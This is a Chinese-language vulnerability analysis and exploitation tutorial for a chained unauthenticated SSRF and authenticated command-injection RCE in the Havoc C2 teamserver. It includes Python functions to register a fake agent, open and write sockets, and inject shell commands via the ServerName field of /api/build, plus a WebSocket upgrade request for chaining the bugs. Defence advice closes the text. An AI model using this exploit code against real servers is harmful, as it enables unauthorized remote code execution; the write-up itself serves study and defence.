Havoc C2 SSRF+RCE组合漏洞分析与利用教学<\/h1>

1. 漏洞概述<\/h2>

Havoc C2是一个开源的命令与控制框架，近期被发现存在两个关键漏洞的组合利用链：<\/p>

未授权SSRF漏洞<\/strong>：允许攻击者通过精心构造的HTTP请求实现服务器端请求伪造<\/li>

授权RCE漏洞<\/strong>：在生成payload时存在命令注入漏洞，可导致远程代码执行<\/li> <\/ol>
这两个漏洞组合后可形成完整的攻击链，实现对Havoc C2服务器的完全控制。<\/p>
2. 漏洞分析<\/h2>
2.1 未授权SSRF漏洞分析<\/h3>
2.1.1 漏洞触发流程<\/h4>

ListenerStart函数<\/strong>：Havoc开启监听时调用，配置后调用Start()函数<\/li>
Start()函数<\/strong>：使用Gin框架设置路由，将所有POST请求映射到h.request<\/li>
request方法<\/strong>：

读取请求体到Body变量<\/li>
验证URI和User-Agent<\/li>
通过过滤后将Body传递给parseAgentRequest<\/li> <\/ul> <\/li> <\/ol>
2.1.2 关键数据结构<\/h4>
POST Body的数据结构：<\/p>
[Size 4字节][Magic Value 4字节][Agent ID 4字节][Data] <\/code><\/pre> Magic Value: 0xDEADBEEF<\/code> (DEMON_MAGIC_VALUE)<\/li> DEMON_INIT: 99 (用于初始注册)<\/li> <\/ul> 2.1.3 注册代理流程<\/h4> 当MagicValue匹配时，调用handleDemonAgent函数<\/li> 当AgentID不存在时：读取Data前4字节赋予Command变量<\/li> 与DEMON_INIT(99)比较<\/li> 通过ParseDemonRegisterRequest创建Agent<\/li> <\/ul> <\/li> <\/ol> 2.1.4 SSRF触发点<\/h4> 在TaskDispatch函数中：<\/p> 检查IsKnownRequestID函数<\/li> 当CommandID为特定值时绕过RequestID检查<\/li> COMMAND_SOCKET(2540)分支可触发SSRF<\/li> <\/ul> 2.1.5 Socket操作<\/h4> SOCKET_COMMAND_OPEN(16)<\/strong>：创建端口转发结构<\/li> 添加到Agent的端口转发列表<\/li> <\/ul> <\/li> SOCKET_COMMAND_READ(11)<\/strong>：调用PortFwdOpen创建TCP Socket<\/li> 使用net.Dial建立连接<\/li> <\/ul> <\/li> <\/ol> 2.2 授权RCE漏洞分析<\/h3> 2.2.1 漏洞位置<\/h4> teamserver\/pkg\/common\/builder\/builder.go<\/code>中的payload生成部分<\/p> 2.2.2 漏洞原理<\/h4> 参数传入compilerOptions.Defines<\/li> CompileCommand获取参数组成命令<\/li> 传入CompileCmd函数执行<\/li> 最终通过Cmd函数执行系统命令<\/li> <\/ol> 3. 漏洞利用<\/h2> 3.1 SSRF利用<\/h3> 3.1.1 注册Agent<\/h4> def<\/span> register_agent<\/span>(teamserver_url, aes_key, aes_iv, hostname, username, domain, internal_ip): <\/span><\/span> agent_header =<\/span> b<\/span>""<\/span> <\/span><\/span> header_data =<\/span> b<\/span>""<\/span> <\/span><\/span> <\/span><\/span> # 构造agent_header: size + magic_value + agent_id<\/span> <\/span><\/span> agent_header +=<\/span> int_to_bytes(12<\/span> +<\/span> len(header_data), 4<\/span>) # size<\/span> <\/span><\/span> agent_header +=<\/span> int_to_bytes(0xDEADBEEF<\/span>, 4<\/span>) # magic_value<\/span> <\/span><\/span> agent_header +=<\/span> int_to_bytes(0<\/span>, 4<\/span>) # agent_id<\/span> <\/span><\/span> <\/span><\/span> # 构造header_data<\/span> <\/span><\/span> header_data +=<\/span> int_to_bytes(99<\/span>, 4<\/span>) # DEMON_INIT<\/span> <\/span><\/span> header_data +=<\/span> aes_key # AESKey<\/span> <\/span><\/span> header_data +=<\/span> aes_iv # AESIV<\/span> <\/span><\/span> # 添加其他注册信息...<\/span> <\/span><\/span> <\/span><\/span> data =<\/span> agent_header +<\/span> header_data <\/span><\/span> requests.<\/span>post(teamserver_url, data=<\/span>data) <\/span><\/span><\/code><\/pre>3.1.2 开启Socket<\/h4> def<\/span> open_socket<\/span>(teamserver_url, agent_id, target_ip, target_port): <\/span><\/span> command =<\/span> 2540<\/span> # COMMAND_SOCKET<\/span> <\/span><\/span> subcommand =<\/span> 16<\/span> # SOCKET_COMMAND_OPEN<\/span> <\/span><\/span> <\/span><\/span> # 构造IP和端口<\/span> <\/span><\/span> ip_parts =<\/span> target_ip.<\/span>split('.'<\/span>) <\/span><\/span> reversed_ip =<\/span> '.'<\/span>.<\/span>join(reversed(ip_parts)) <\/span><\/span> ip_bytes =<\/span> bytes([int(part) for<\/span> part in<\/span> reversed_ip.<\/span>split('.'<\/span>)]) <\/span><\/span> port_bytes =<\/span> int_to_bytes(target_port, 2<\/span>) <\/span><\/span> <\/span><\/span> # 构造数据包<\/span> <\/span><\/span> data =<\/span> int_to_bytes(command, 4<\/span>) +<\/span> int_to_bytes(subcommand, 4<\/span>) +<\/span> ip_bytes +<\/span> port_bytes <\/span><\/span> # 发送请求...<\/span> <\/span><\/span><\/code><\/pre>3.1.3 写入Socket<\/h4> def<\/span> write_socket<\/span>(teamserver_url, agent_id, socket_id, request_data): <\/span><\/span> command =<\/span> 2540<\/span> # COMMAND_SOCKET<\/span> <\/span><\/span> subcommand =<\/span> 11<\/span> # SOCKET_COMMAND_READ<\/span> <\/span><\/span> socket_type =<\/span> 3<\/span> # SOCKET_TYPE_CLIENT<\/span> <\/span><\/span> <\/span><\/span> # 构造数据包<\/span> <\/span><\/span> data =<\/span> ( <\/span><\/span> int_to_bytes(command, 4<\/span>) +<\/span> <\/span><\/span> int_to_bytes(subcommand, 4<\/span>) +<\/span> <\/span><\/span> int_to_bytes(socket_id, 4<\/span>) +<\/span> <\/span><\/span> int_to_bytes(socket_type, 4<\/span>) +<\/span> <\/span><\/span> int_to_bytes(1<\/span>, 4<\/span>) +<\/span> # success = TRUE<\/span> <\/span><\/span> request_data <\/span><\/span> ) <\/span><\/span> # 发送请求...<\/span> <\/span><\/span><\/code><\/pre>3.2 RCE利用<\/h3> 3.2.1 命令注入<\/h4> def<\/span> exploit_rce<\/span>(teamserver_url, auth_token, command): <\/span><\/span> # 构造恶意payload<\/span> <\/span><\/span> injection =<\/span> f<\/span>'"; <\/span>{<\/span>command}<\/span>; #'<\/span> <\/span><\/span> <\/span><\/span> headers =<\/span> { <\/span><\/span> "Authorization"<\/span>: f<\/span>"Bearer <\/span>{<\/span>auth_token}<\/span>"<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> data =<\/span> { <\/span><\/span> "ServerName"<\/span>: injection, <\/span><\/span> # 其他必要参数...<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> requests.<\/span>post(f<\/span>"<\/span>{<\/span>teamserver_url}<\/span>\/api\/build"<\/span>, headers=<\/span>headers, json=<\/span>data) <\/span><\/span><\/code><\/pre>3.3 组合利用链<\/h3> 通过SSRF将流量代理到teamserver本地的40056端口<\/p> <\/li> 构造HTTP升级为WebSocket的请求：<\/p> GET \/api\/ws HTTP\/1.1 Host: localhost:40056 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw== Sec-WebSocket-Version: 13 <\/code><\/pre> <\/li> 构造WebSocket帧发送RCE payload<\/p> <\/li> <\/ol> 4. 利用限制与注意事项<\/h2> 回显问题<\/strong>：<\/p> Havoc通过job结构体返回结果<\/li> 协议升级后可能无法接收回显<\/li> <\/ul> <\/li> 协议升级限制<\/strong>：<\/p> 默认使用wss协议(WebSocket over TLS)<\/li> 通过SSRF只能升级到ws协议(非加密)<\/li> 需要目标服务器打补丁降级为ws协议<\/li> <\/ul> <\/li> 利用前提<\/strong>：<\/p> 40056端口需开在本地<\/li> 需要获取有效的账号密码<\/li> 服务器配置需允许协议降级<\/li> <\/ul> <\/li> <\/ol> 5. 防御建议<\/h2> 限制Teamserver的监听地址，避免暴露在公网<\/li> 加强认证机制，使用强密码<\/li> 监控异常的网络连接和进程创建<\/li> 及时更新到修复版本<\/li> 避免使用默认端口和配置<\/li> <\/ol> 6. 参考资源<\/h2> Havoc C2 SSRF PoC<\/a><\/li> Havoc RCE PoC<\/a><\/li> S1Null师傅的利用脚本<\/a><\/li> <\/ol>